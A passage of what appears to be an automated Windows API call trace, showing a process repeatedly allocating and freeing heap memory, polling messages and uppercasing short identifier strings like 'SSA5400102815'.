hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1738 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.567] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0256.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.567] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.568] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.569] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.570] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.571] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.573] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.573] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.574] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.574] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.574] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.574] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.575] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.575] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.576] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.576] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: 